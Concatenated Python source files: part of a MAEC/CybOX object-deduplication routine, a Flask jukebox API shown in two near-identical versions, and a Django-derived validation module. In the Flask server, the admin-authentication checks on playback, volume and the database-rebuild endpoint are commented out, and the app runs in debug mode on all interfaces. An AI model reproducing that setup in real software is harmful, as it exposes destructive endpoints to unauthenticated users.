for collection in bundle.collections.object_collections:
# Ignore the re-used objects collection
if collection.name and collection.name == "Deduplicated Objects":
continue
# List of Objects to remove
objs = [x for x in collection.object_list if (x.idref and x.idref in cls.object_ids_mapping.values())]
for obj in objs:
collection.object_list.remove(obj)
@classmethod
def handle_duplicate_objects(cls, bundle, all_objects):
"""Replace all of the duplicate Objects with references to the unique object placed in the "Re-used Objects" Collection."""
for duplicate_object_id, unique_object_id in cls.object_ids_mapping.items():
for object in all_objects:
if object.id_ == duplicate_object_id or object.idref == duplicate_object_id:
# Modify the existing Object to serve as a reference to
# the unique Object in the collection
object.idref = unique_object_id
object.id_ = None
object.properties = None
object.related_objects = None
object.domain_specific_object_properties = None
@classmethod
def handle_unique_objects(cls, bundle, all_objects):
"""Add a new Object collection to the Bundle for storing the unique Objects.
Add the Objects to the collection. """
# First, find the ID of the last Object Collection (if applicable)
counter = 1
if bundle.collections and bundle.collections.object_collections:
for object_collection in bundle.collections.object_collections:
counter += 1
# Find the namespace used in the Bundle IDs
bundle_namespace = bundle.id.split('-')[1]
# Build the collection ID
collection_id = "maec-" + bundle_namespace + "-objc-" + str(counter)
# Add the named Object collection
bundle.add_named_object_collection("Deduplicated Objects", collection_id)
# Add the unique Objects to the collection
cls.add_unique_objects(bundle, all_objects)
@classmethod
def add_unique_objects(cls, bundle, all_objects):
"""Add the unique Objects to the collection and perform the properties replacement."""
added_ids = []
for unique_object_id in cls.object_ids_mapping.values():
if unique_object_id not in added_ids:
for object in all_objects:
if object.id_ and object.id_ == unique_object_id:
object_copy = copy.deepcopy(object)
if isinstance(object_copy, cybox.core.AssociatedObject):
object_copy.association_type = None
elif isinstance(object_copy, cybox.core.RelatedObject):
object_copy.relationship = None
# Modify the existing Object to serve as a reference to the Object in the collection
object.idref = object.id_
object.id_ = None
object.properties = None
object.related_objects = None
object.domain_specific_object_properties = None
# Add the unique Object to the collection
bundle.add_object(object_copy, "Deduplicated Objects")
# Break out of the all_objects loop
break
added_ids.append(unique_object_id)
@classmethod
def map_objects(cls, all_objects):
"""Map the non-unique Objects to their unique (first observed) counterparts."""
# Do the object mapping
for obj in all_objects:
matching_object_id = cls.find_matching_object(obj)
if matching_object_id:
cls.object_ids_mapping[obj.id_] = matching_object_id
@classmethod
def get_typedfield_values(cls, val, name, values, ignoreCase = False):
"""Returns the value contained in a TypedField or its nested members, if applicable."""
# If it's a BaseProperty instance, then we're done. Return it.
if isinstance(val, BaseProperty):
if ignoreCase:
values.add(name + ":" + str(val))
else:
values.add(name + ":" + str(val).lower())
# If it's a list, then we need to iterate through each of its members
elif isinstance(val, collections.MutableSequence):
for list_item in val:
for list_item_property in list_item._get_vars():
cls.get_typedfield_values(getattr(list_item, str(list_item_property)), name + "/" + str(list_item_property), values, ignoreCase)
# If it's a cybox.Entity, then we need to iterate through its properties
elif isinstance(val, cybox.Entity):
for item_property in val._get_vars():
cls.get_typedfield_values(getattr(val, str(item_property)), name + "/" + str(item_property), values, ignoreCase)
@classmethod
def get_object_values(cls, obj, ignoreCase = False):
"""Get the values specified for an Object's properties as a set."""
values = set()
for typed_field in obj.properties._get_vars():
# Make sure the typed field is comparable
if typed_field.comparable:
val = getattr(obj.properties, str(typed_field))
if val is not None:
cls.get_typedfield_values(val, str(typed_field), values, ignoreCase)
return values
@classmethod
def find_matching_object(cls, obj):
"""Find a matching object, if it exists."""
if obj and obj.properties:
object_values = cls.get_object_values(obj)
xsi_type = obj.properties._XSI_TYPE
if xsi_type and xsi_type in cls.objects_dict:
types_dict = cls.objects_dict[xsi_type]
# See if we already have an identical object in the dictionary
for obj_id, obj_values in types_dict.items():
if obj_values == object_values:
# If so, return its ID for use in the IDREF
return obj_id
# If not, add it to the dictionary
types_dict[obj.id_] = object_values
elif xsi_type and xsi_type not in cls.objects_dict:
types_dict = {obj.id_:object_values}
cls.objects_dict[xsi_type] = types_dict
return None
|
from flask import Flask, request, abort, jsonify
from flask.ext.cors import CORS
from werkzeug.contrib.fixers import ProxyFix
from Models import *
import peewee
from uuid import uuid4
import hashlib
from nocache import nocache
from GeneralApiException import GeneralApiException
import UserApi
from AuthenticationApi import *
import SetUp
from SearchApi import youtubeSearch
from RegexApi import *
from ApiCalls import *
##################
## Server SetUp ##
##################
db = peewee.PostgresqlDatabase('postgres', host='db', user='postgres')
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
CORS(app, headers=['Content-Type'])
app.hasSetConsume = False # a bool to set consome songs the first time an add song request is made
####################
## Errror Handler ##
####################
@app.errorhandler(GeneralApiException)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = 200
return response
###########
## Users ##
###########
@app.route('/users/<string:key>')
@nocache
def getUser(key):
return UserApi.getUser(key)
@app.route('/user', methods=["POST"])
@nocache
@requireAdmin
def CreateUser():
"""
{
"username":"jdoe"
"password":"boi",
"firstName":"john",
"lastName": "doe",
"email": "jdoe@jdoe.com",
}
Requires admin authentication
"""
return UserApi.createUser(request.json)
@app.route('/user/edit', methods=["POST"])
@nocache
@requireAuth
def EditUser():
"""
Requires authentication
"""
return UserApi.editUser(request.json)
####################
## Authentication ##
####################
@app.route('/authenticate', methods=["POST"])
@nocache
def Authentication():
"""
{
"username":"jdoe",
"password":"boi",
}
"""
return authentication(request.json)
@app.route('/authenticate/verify', methods=["POST"])
@nocache
def VerifyToken():
"""
{
Verifies that a user token is valid.
Example Call:
"token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
}
"""
return jsonify({'result': validateAuthToken(request.json["token"], False)})
@app.route('/authenticate/verify/admin', methods=["POST"])
@nocache
def VerifyAdminToken():
"""
{
Verifies that a user token is a valid admin token.
Example Call:
"token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
}
"""
return jsonify({'result': validateAuthToken(request.json["token"], True)})
############
## Search ##
############
@app.route('/search/<string:query>', methods=["GET"])
@nocache
@requireAuth
def Search(query):
"""
Requires authentication
"""
return youtubeSearch(query)
#############
## Regexes ##
#############
@app.route('/regex/<string:key>', methods=["GET"])
@nocache
@requireAdmin
def GetRegex(key):
"""
Requires authentication
"""
return getRegex(key)
@app.route('/regex', methods=["POST"])
@nocache
@requireAdmin
def AddRegex():
"""
Example Request Object:
{
"pattern":"a*b*c*"
}
Requires admin authentication
"""
regex = addRegex(request.json["pattern"])
return regex
@app.route('/regex', methods=["DELETE"])
@nocache
@requireAdmin
def RemoveRegex():
"""
Example Request Objexts:
{
"key":"1234"
}
Require admin authentication
"""
return removeRegex(request.json["key"])
###############
## Api Calls ##
###############
@app.route('/playback/add', methods=["POST"])
@nocache
#@requireAuth
def AddSong():
"""
Requires Auth
"""
song = request.json['song']
if not app.hasSetConsume:
setConsume()
app.hasSetConsume = True
return addSong(song)
@app.route('/playback/play', methods=["GET"])
@nocache
#@requireAdmin
def PlaySong():
"""
Requires Admin Authentication
"""
return playSong()
@app.route('/playback/pause', methods=["GET"])
@nocache
#@requireAdmin
def PauseSong():
"""
Requires Admin Authentication
"""
return pauseSong()
@app.route('/playback/stop', methods=["GET"])
@nocache
@requireAdmin
def StopSong():
"""
Requires Admin Authentication
"""
return stopSong()
@app.route('/playback/next', methods=["GET"])
@nocache
@requireAdmin
def NextSong():
"""
Requires Admin Authenciation
"""
return nextSong()
@app.route('/playback/clear', methods=["GET"])
@nocache
@requireAdmin
def ClearSongs():
"""
Requires Admin Authentication
"""
return clearSongs()
@app.route('/playback/list', methods=["GET"])
@nocache
@requireAdmin
def GetTracks():
"""
Require Admin Authentication
"""
return getTracks()
@app.route('/playback/state', methods=["GET"])
@nocache
@requireAdmin
def GetState():
"""
Require Admin Authentication
"""
return getState()
@app.route('/volume/up', methods=["GET"])
@nocache
#@requireAdmin
def IncreaseVolume():
"""
Require Admin Authentication
"""
return increaseVolume()
@app.route('/volume/down', methods=["GET"])
@nocache
#@requireAdmin
def DecreaseVolume():
"""
Require Admin Authentication
"""
return decreaseVolume()
@app.route('/volume', methods=["GET"])
@nocache
#@requireAdmin
def GetVolume():
"""
Require Admin Authentication
"""
return jsonify(getVolume())
@app.route('/volume/<int:key>', methods=["GET"])
@nocache
#@requireAdmin
def SetVolume(key):
"""
Require Admin Authentication
"""
return jsonify(setVolume(key))
####################
## Build Database ##
####################
@app.route('/buildDb')
@nocache
#@requireAdmin
def BuildDb():
"""
Requires Admin Authentication
"""
SetUp.main()
return "Database rebuilt"
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
fixed #13
from flask import Flask, request, abort, jsonify
from flask.ext.cors import CORS
from werkzeug.contrib.fixers import ProxyFix
from Models import *
import peewee
from uuid import uuid4
import hashlib
from nocache import nocache
from GeneralApiException import GeneralApiException
import UserApi
from AuthenticationApi import *
import SetUp
from SearchApi import youtubeSearch
from RegexApi import *
from SongApi import *
##################
## Server SetUp ##
##################
db = peewee.PostgresqlDatabase('postgres', host='db', user='postgres')
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
CORS(app, headers=['Content-Type'])
app.hasSetConsume = False # a bool to set consome songs the first time an add song request is made
####################
## Errror Handler ##
####################
@app.errorhandler(GeneralApiException)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = 200
return response
###########
## Users ##
###########
@app.route('/users/<string:key>')
@nocache
def getUser(key):
return UserApi.getUser(key)
@app.route('/user', methods=["POST"])
@nocache
@requireAdmin
def CreateUser():
"""
{
"username":"jdoe"
"password":"boi",
"firstName":"john",
"lastName": "doe",
"email": "jdoe@jdoe.com",
}
Requires admin authentication
"""
return UserApi.createUser(request.json)
@app.route('/user/edit', methods=["POST"])
@nocache
@requireAuth
def EditUser():
"""
Requires authentication
"""
return UserApi.editUser(request.json)
####################
## Authentication ##
####################
@app.route('/authenticate', methods=["POST"])
@nocache
def Authentication():
"""
{
"username":"jdoe",
"password":"boi",
}
"""
return authentication(request.json)
@app.route('/authenticate/verify', methods=["POST"])
@nocache
def VerifyToken():
"""
{
Verifies that a user token is valid.
Example Call:
"token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
}
"""
return jsonify({'result': validateAuthToken(request.json["token"], False)})
@app.route('/authenticate/verify/admin', methods=["POST"])
@nocache
def VerifyAdminToken():
"""
{
Verifies that a user token is a valid admin token.
Example Call:
"token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
}
"""
return jsonify({'result': validateAuthToken(request.json["token"], True)})
############
## Search ##
############
@app.route('/search/<string:query>', methods=["GET"])
@nocache
@requireAuth
def Search(query):
"""
Requires authentication
"""
return youtubeSearch(query)
#############
## Regexes ##
#############
@app.route('/regex/<string:key>', methods=["GET"])
@nocache
@requireAdmin
def GetRegex(key):
"""
Requires authentication
"""
return getRegex(key)
@app.route('/regex', methods=["POST"])
@nocache
@requireAdmin
def AddRegex():
"""
Example Request Object:
{
"pattern":"a*b*c*"
}
Requires admin authentication
"""
regex = addRegex(request.json["pattern"])
return regex
@app.route('/regex', methods=["DELETE"])
@nocache
@requireAdmin
def RemoveRegex():
"""
Example Request Objexts:
{
"key":"1234"
}
Require admin authentication
"""
return removeRegex(request.json["key"])
###############
## Api Calls ##
###############
@app.route('/playback/add', methods=["POST"])
@nocache
#@requireAuth
def AddSong():
"""
Requires Auth
"""
song = request.json['song']
if not app.hasSetConsume:
setConsume()
app.hasSetConsume = True
return addSong(song)
@app.route('/playback/play', methods=["GET"])
@nocache
#@requireAdmin
def PlaySong():
"""
Requires Admin Authentication
"""
return playSong()
@app.route('/playback/pause', methods=["GET"])
@nocache
#@requireAdmin
def PauseSong():
"""
Requires Admin Authentication
"""
return pauseSong()
@app.route('/playback/stop', methods=["GET"])
@nocache
@requireAdmin
def StopSong():
"""
Requires Admin Authentication
"""
return stopSong()
@app.route('/playback/next', methods=["GET"])
@nocache
@requireAdmin
def NextSong():
"""
Requires Admin Authenciation
"""
return nextSong()
@app.route('/playback/clear', methods=["GET"])
@nocache
@requireAdmin
def ClearSongs():
"""
Requires Admin Authentication
"""
return clearSongs()
@app.route('/playback/list', methods=["GET"])
@nocache
@requireAdmin
def GetTracks():
"""
Require Admin Authentication
"""
return getTracks()
@app.route('/playback/state', methods=["GET"])
@nocache
@requireAdmin
def GetState():
"""
Require Admin Authentication
"""
return getState()
@app.route('/volume/up', methods=["GET"])
@nocache
#@requireAdmin
def IncreaseVolume():
"""
Require Admin Authentication
"""
return increaseVolume()
@app.route('/volume/down', methods=["GET"])
@nocache
#@requireAdmin
def DecreaseVolume():
"""
Require Admin Authentication
"""
return decreaseVolume()
@app.route('/volume', methods=["GET"])
@nocache
#@requireAdmin
def GetVolume():
"""
Require Admin Authentication
"""
return jsonify(getVolume())
@app.route('/volume/<int:key>', methods=["GET"])
@nocache
#@requireAdmin
def SetVolume(key):
"""
Require Admin Authentication
"""
return jsonify(setVolume(key))
####################
## Build Database ##
####################
@app.route('/buildDb')
@nocache
#@requireAdmin
def BuildDb():
"""
Requires Admin Authentication
"""
SetUp.main()
return "Database rebuilt"
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
|
"""Validation code, much of it originally forked from Django."""
from __future__ import print_function
import six
# Import half of the friggin stdlib :)
import platform
import re
try:
# Python 2
from urllib2 import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib import quote
from urlparse import urlsplit, urlunsplit
except ImportError:
# Python 3
from urllib.request import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib.parse import quote, urlsplit, urlunsplit
import operator
import types
import datetime
from decimal import Decimal
import xml.parsers.expat
from numbers import Number
from functools import reduce
def validate_model_instance(model,
instance,
handle_none=False,
embedded_models=None,
callback=None):
"""Validate a single instance.
Required Arguments:
* model - the model definition (dictionary or dictionary-like object)
* instance - the instance (dictionary or dictionary-like object)
Optional Arguments:
* handle_none - set to True to allow None to always be valid data,
default is False. This can be useful in dealing data that came
(at least at one time) from SQL data.
* embedded_models - a dictionary of model definitions, where the key is
the model name, value is the model definition. This dictionary is used
to validate embedded instances.
* callback - an optional callback to run after validation.
"""
model_validator = ModelValidator(model,
handle_none=handle_none,
embedded_models=embedded_models)
if callback:
try:
model_validator.validate_instance(instance)
except ValidationError:
callback(False, instance)
else:
callback(True, instance)
else:
model_validator.validate_instance(instance)
def parse_instance(instance, result_set):
"""Add the models that an instance uses to result_set."""
for key, value in six.iteritems(instance):
if key == '_model':
result_set.add(value)
if isinstance(value, dict):
if '_model' in value:
result_set.add(value['_model'])
parse_instance(value, result_set)
if isinstance(value, list):
for item in value:
if isinstance(item, dict):
parse_instance(item, result_set)
def validate_modification(model,
modification,
handle_none=False,
embedded_models=None,
callback=None):
"""We validate a modification.
This assumes the existing version has already been through validation.
TODO: support embedded instances.
"""
model_validator = ModelValidator(model,
handle_none=handle_none,
embedded_models=embedded_models)
try:
model_validator.validate_modification(model, modification)
except ValidationError:
if callback:
return callback(False, modification)
else:
raise
else:
if callback:
return callback(True, modification)
class ModelValidator(object):
"""Validates instances according to a model."""
def __init__(self,
model,
handle_none=False,
dispatcher=None,
embedded_models=None):
if dispatcher:
self.dispatch = dispatcher
else:
self.dispatch = dict(DISPATCHER)
self.model = model
self.model_keys = set(model.keys())
self.handle_none = handle_none
self.embedded_models = embedded_models
try:
self.model_keys.remove('modeldescription')
except KeyError:
pass
try:
self.model_keys.remove(u'_id')
except KeyError:
pass
try:
self.model_keys.remove('_permissions')
except KeyError:
pass
try:
self.model_keys.remove('_view')
except KeyError:
pass
try:
self.model_keys.remove('_model')
except KeyError:
pass
def do_dispatch(self, field_type, field_data):
"""Do the dispatch."""
if field_type == 'Embedded' or field_type == 'EmbeddedList':
return self.dispatch[field_type](field_data,
self.embedded_models)
self.dispatch[field_type](field_data)
def validate_field(self, field_type, field_data):
"""Validate if the field_data is valid for the field_type."""
try:
self.do_dispatch(field_type, field_data)
except ValidationError:
if field_data is None and self.handle_none:
pass
else:
raise
def validate_instance(self, instance):
"""Validate that the instance meets the requirements of the model."""
instance_keys = set(instance.keys())
try:
instance_keys.remove('_model')
except KeyError:
raise OrphanedInstance('The instance does not have a model key.')
try:
instance_keys.remove('_id')
except KeyError:
pass
try:
instance_keys.remove('_meta')
except KeyError:
pass
try:
instance_keys.remove('_view')
except KeyError:
pass
try:
instance_keys.remove('_versional_comment')
except KeyError:
pass
try:
instance_keys.remove('_operation')
except KeyError:
pass
try:
instance_keys.remove('_permissions')
except KeyError:
pass
# Sanity checks
self.check_for_unknown_fields(instance_keys)
self.check_for_missing_fields(instance_keys)
# Check for valid fields
try:
validity = [self.validate_field(self.model[field]['field'],
instance[field]) for \
field in instance_keys]
except TypeError:
print("Died on %s " % instance['_id'])
print("Perhaps invalid model?")
raise
# If they are all valid, then do nothing
return None
def check_for_unknown_fields(self, instance_keys):
"""Check for nonsense extra fields."""
extra_fields = instance_keys - self.model_keys
if extra_fields:
if len(extra_fields) == 1:
raise InvalidFields(extra_fields.pop())
else:
raise InvalidFields(tuple(extra_fields))
def check_for_missing_fields(self, instance_keys):
"""Some fields are allowed to be missing, others are just AWOL."""
missing_fields = self.model_keys - instance_keys
if missing_fields:
# Some fields are allowed to be missing, others are just AWOL.
awol = set()
for field in missing_fields:
try:
if self.model[field]['required'] == True:
awol.add(field)
except KeyError:
awol.add(field)
if awol:
if len(awol) == 1:
raise MissingFields(awol.pop())
else:
raise MissingFields(tuple(awol))
def validate_modification(self, model, modification):
for modification_name, \
modification_value in six.iteritems(modification):
validator = MODIFICATION_DISPATCHER[modification_name]
for tfield, value in six.iteritems(modification_value):
field, field_type = self.get_field(tfield, model)
validator(self, model, field, field_type, value)
def get_field(self, field, model):
"""If no dots, it is a top level field,
otherwise look through the models for the field."""
if not '.' in field:
return field, model[field]['field']
parts = field.split('.')
field_name = parts.pop(-1)
if field_name == '$':
field_name = parts.pop(-1)
model_name = parts.pop(-1)
if model_name == '$':
model_name = parts.pop(-1)
if model_name in self.embedded_models:
if field_name in self.embedded_models[model_name]:
field = self.embedded_models[model_name][field_name]
elif model_name in model:
real_model_name = model[model_name].get('resource', model_name)
field = self.embedded_models[real_model_name][field_name]
field_type = field['field']
return field, field_type
def get_all_modification_modelnames(model, modification):
"""Get all model names from a modification."""
models = set()
tree = []
for modification_type, field in six.iteritems(modification):
tree.append(field)
for fieldname, fieldvalue in six.iteritems(field):
tree.append(fieldname)
if '.' in fieldname:
parts = fieldname.split('.')
parts = [part for part in parts if part != '$']
for part in parts[:-1]:
tree.append(part)
models.add(part)
real_models = set()
unknown_keys = set()
for model_name in models:
# Maybe it is a top level field
if model_name in model:
real_models.add(model[model_name].get('resource', model_name))
continue
# It is not a top level field
if isinstance(model_name, int):
# It is a positional operator, skip it
continue
# Not sure what it is yet.
unknown_keys.add(model_name)
# Get rid of anything we know about.
# Maybe later we do something else
unknown_keys = unknown_keys - real_models
return list(real_models), list(unknown_keys)
class InvalidInstance(Exception):
"""An instance has not met the requirements of the model.
If you do not care why an instance is invalid, you can
use this superclass and it will catch all subclasses."""
pass
class InvalidFields(InvalidInstance):
"""An instance has a field(s) which is not defined in the model."""
pass
class MissingFields(InvalidInstance):
"""An instance is missing a field(s) which is required by the model."""
pass
class OrphanedInstance(InvalidInstance):
"""An instance is not associated with a class."""
pass
URL_VALIDATOR_USER_AGENT = 'Django (http://www.djangoproject.com/)'
NON_FIELD_ERRORS = '__all__'
class ValidationError(Exception):
"""An error while validating data."""
def __init__(self, message, code=None, params=None):
"""
ValidationError can be passed any object that can be printed (usually
a string), a list of objects or a dictionary.
"""
super(ValidationError, self).__init__(message)
if isinstance(message, dict):
self.message_dict = message
# Reduce each list of messages into a single list.
message = reduce(operator.add, message.values())
if isinstance(message, list):
self.messages = [force_unicode(msg) for msg in message]
else:
self.code = code
self.params = params
message = force_unicode(message)
self.messages = [message]
def __str__(self):
# This is needed because, without a __str__(), printing an exception
# instance would result in this:
# AttributeError: ValidationError instance has no attribute 'args'
# See http://www.python.org/doc/current/tut/node10.html#handling
if hasattr(self, 'message_dict'):
return repr(self.message_dict)
return repr(self.messages)
def __repr__(self):
if hasattr(self, 'message_dict'):
return 'ValidationError(%s)' % repr(self.message_dict)
return 'ValidationError(%s)' % repr(self.messages)
def update_error_dict(self, error_dict):
"""Update the error dict with messages."""
if hasattr(self, 'message_dict'):
if error_dict:
for k, value in self.message_dict.items():
error_dict.setdefault(k, []).extend(value)
else:
error_dict = self.message_dict
else:
error_dict[NON_FIELD_ERRORS] = self.messages
return error_dict
# These values, if given to validate(), will trigger the self.required check.
EMPTY_VALUES = (None, '', [], (), {})
class RegexValidator(object):
"""
A validator is a callable that takes a value and raises a
ValidationError if it doesn't meet some criteria.
Validators can be useful for re-using validation logic
between different types of fields.
Parameters:
regex -- If not None, overrides regex.
Can be a regular expression string or a pre-compiled regular expression.
message -- If not None, overrides message.
code -- If not None, overrides code.
regex
The regular expression pattern to search for the provided value,
or a pre-compiled regular expression.
Raises a ValidationError with message and code if no match is found.
By default, matches any string (including an empty string).
message
The error message used by ValidationError if validation fails.
Defaults to "Enter a valid value".
code
The error code used by ValidationError if validation fails.
Defaults to "invalid".
"""
regex = ''
message = u'Enter a valid value.'
code = 'invalid'
def __init__(self, regex=None, message=None, code=None):
if regex is not None:
self.regex = regex
if message is not None:
self.message = message
if code is not None:
self.code = code
# Compile the regex if it was not passed pre-compiled.
if isinstance(self.regex, basestring):
self.regex = re.compile(self.regex)
def __call__(self, value):
"""
Validates that the input matches the regular expression.
"""
if not self.regex.search(smart_unicode(value)):
raise ValidationError(self.message, code=self.code)
class URLValidator(RegexValidator):
"""
A RegexValidator that ensures a value looks like a URL
and optionally verifies that the URL actually exists
(i.e., doesn't return a 404 status code).
Raises an error code of 'invalid' if it doesn't look like a URL,
and a code of 'invalid_link' if it doesn't exist.
Parameters:
verify_exists -- Sets verify_exists. Defaults to False.
validator_user_agent -- Sets validator_user_agent.
Defaults to URL_VALIDATOR_USER_AGENT or,
if that setting is set to a null value,
"Django (http://www.djangoproject.com/)".
validator_user_agent
If verify_exists is True, Django uses this value as
the "User-agent" for the request.
verify_exists
If set to True, this validator checks that the URL actually exists
and resolves, by issuing a request to it.
This is really handy, but should only be used for trusted users,
e,g. staff-only mode.
If you allow public-facing code to use this, there is potential for
a denial of service attack.
This option is to be used between consenting adults only!
This problem is particularly pronounced in Python 2.5 and below
since the underlying socket libraries in Python do not have a timeout.
This can manifest as a security problem in three different ways:
1. An attacker can supply a slow-to-respond URL.
Each request will tie up a server process for a period of time;
if the attacker is able to make enough requests,
they can tie up all available server processes.
2. An attacker can supply a URL under his or her control,
and which will simply hold an open connection indefinitely.
Due to the lack of timeout, the Django process attempting to
verify the URL will similarly spin indefinitely.
Repeating this can easily tie up all available server processes.
3. An attacker can supply a URL under his or her control which
not only keeps the connection open, but also sends an unending
stream of random garbage data.
This data will cause the memory usage of the Django process
(which will hold the response in memory) to grow without bound,
thus consuming not only server processes but also server memory.
Note, Python 2.5 is not actually supported by Magpy because of the
Python 3 compatibility.
For Python versions 2.6 and above, which support setting a timeout,
a timeout of ten seconds will be set;
Therefore only use in trusted contexts and where the utility
is sufficient to warrant the potential risks it creates.
"""
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)'
r'+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def __init__(self, verify_exists=False,
validator_user_agent=URL_VALIDATOR_USER_AGENT):
super(URLValidator, self).__init__()
self.verify_exists = verify_exists
self.user_agent = validator_user_agent
def __call__(self, value):
try:
super(URLValidator, self).__call__(value)
except ValidationError as excptn:
# Trivial case failed. Try for possible IDN domain
if value:
value = smart_unicode(value)
scheme, \
netloc, \
path, \
query, \
fragment = urlsplit(value)
try:
netloc = netloc.encode('idna') # IDN -> ACE
except UnicodeError: # invalid domain part
raise excptn
url = urlunsplit((scheme,
netloc,
path,
query,
fragment))
super(URLValidator, self).__call__(url)
else:
raise
else:
url = value
if self.verify_exists:
import warnings
warnings.warn(
"The URLField verify_exists argument has intractable security "
"and performance issues. Accordingly, it has been deprecated.",
DeprecationWarning
)
headers = {
"Accept": "text/xml,application/xml,application/xhtml+xml,"
"text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Connection": "close",
"User-Agent": self.user_agent,
}
url = url.encode('utf-8')
# Quote characters from the unreserved set, refs #16812
url = quote(url, "!*'();:@&=+$,/?#[]")
broken_error = ValidationError(
u'This URL appears to be a broken link.',
code='invalid_link')
try:
req = Request(url, None, headers)
req.get_method = lambda: 'HEAD'
#Create an opener that does not support local file access
opener = OpenerDirector()
#Don't follow redirects, but don't treat them as errors either
error_nop = lambda *args, **kwargs: True
http_error_processor = HTTPErrorProcessor()
http_error_processor.http_error_301 = error_nop
http_error_processor.http_error_302 = error_nop
http_error_processor.http_error_307 = error_nop
handlers = [UnknownHandler(),
HTTPHandler(),
HTTPDefaultErrorHandler(),
FTPHandler(),
http_error_processor]
try:
import ssl
except ImportError:
# Python isn't compiled with SSL support
pass
else:
handlers.append(HTTPSHandler())
list(map(opener.add_handler, handlers))
if platform.python_version_tuple() >= (2, 6):
opener.open(req, timeout=10)
else:
opener.open(req)
except ValueError:
raise ValidationError(u'Enter a valid URL.', code='invalid')
except: # urllib2.URLError, httplib.InvalidURL, etc.
raise broken_error
class EmailValidator(RegexValidator):
"""
A RegexValidator instance that ensures a value looks like an email address.
"""
def __call__(self, value):
try:
super(EmailValidator, self).__call__(value)
except ValidationError as excptn:
# Trivial case failed. Try for possible IDN domain-part
if value and u'@' in value:
parts = value.split(u'@')
try:
parts[-1] = parts[-1].encode('idna')
except UnicodeError:
raise excptn
super(EmailValidator, self).__call__(u'@'.join(parts))
else:
raise
EMAIL_RE = re.compile(
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*" # dot-atom
# quoted-string, see also http://tools.ietf.org/html/rfc2822#section-3.2.5
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r'\\[\001-\011\013\014\016-\177])*"'
r')@((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?$)' # domain
r'|\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE) # literal form, ipv4 address (SMTP 4.1.3)
validate_email = EmailValidator(EMAIL_RE,
u'Enter a valid e-mail address.',
'invalid')
slug_re = re.compile(r'^[-\w]+$')
validate_slug = RegexValidator(
slug_re,
u"Enter a valid 'slug' consisting of letters, numbers, "
u"underscores or hyphens.",
'invalid')
ipv4_re = re.compile(r'^(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}$')
validate_ipv4_address = RegexValidator(ipv4_re,
'Enter a valid IPv4 address.',
'invalid')
def validate_ipv6_address(value):
"""
Check the validity of an IPv6 address.
"""
if not is_valid_ipv6_address(value):
raise ValidationError('Enter a valid IPv6 address.',
code='invalid')
def validate_ipv46_address(value):
"""
Uses both validate_ipv4_address and validate_ipv6_address
to ensure a value is either a valid IPv4 or IPv6 address.
"""
try:
validate_ipv4_address(value)
except ValidationError:
try:
validate_ipv6_address(value)
except ValidationError:
raise ValidationError(u'Enter a valid IPv4 or IPv6 address.',
code='invalid')
ip_address_validator_map = {
'both': ([validate_ipv46_address],
'Enter a valid IPv4 or IPv6 address.'),
'ipv4': ([validate_ipv4_address],
'Enter a valid IPv4 address.'),
'ipv6': ([validate_ipv6_address],
'Enter a valid IPv6 address.'),
}
def ip_address_validators(protocol, unpack_ipv4):
"""
Depending on the given parameters returns the appropriate validators for
the GenericIPAddressField.
This code is here, because it is exactly the same for the
model and the form field.
"""
if protocol != 'both' and unpack_ipv4:
raise ValueError(
"You can only use `unpack_ipv4` if `protocol` is set to 'both'")
try:
return ip_address_validator_map[protocol.lower()]
except KeyError:
raise ValueError("The protocol '%s' is unknown. Supported: %s"
% (protocol, ip_address_validator_map.keys()))
# A RegexValidator instance that ensures a value is a comma-separated
# list of integers.
comma_separated_int_list_re = re.compile('^[\d,]+$')
validate_comma_separated_integer_list = RegexValidator(
comma_separated_int_list_re,
u'Enter only digits separated by commas.',
'invalid')
class BaseValidator(object):
"""Base class of the validation classes defined below."""
compare = lambda self, a, b: a is not b
clean = lambda self, x: x
message = u'Ensure this value is %(limit_value)s ' \
u'(it is %(show_value)s).'
code = 'limit_value'
def __init__(self, limit_value):
self.limit_value = limit_value
def __call__(self, value):
cleaned = self.clean(value)
params = {'limit_value': self.limit_value, 'show_value': cleaned}
if self.compare(cleaned, self.limit_value):
raise ValidationError(
self.message % params,
code=self.code,
params=params,
)
class MaxValueValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'max_value' if value is
greater than max_value."""
compare = lambda self, a, b: a > b
message = u'Ensure this value is less than or equal to %(limit_value)s.'
code = 'max_value'
class MinValueValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'min_value' if
value is less than min_value.
"""
compare = lambda self, a, b: a < b
message = u'Ensure this value is greater than or ' \
u'equal to %(limit_value)s.'
code = 'min_value'
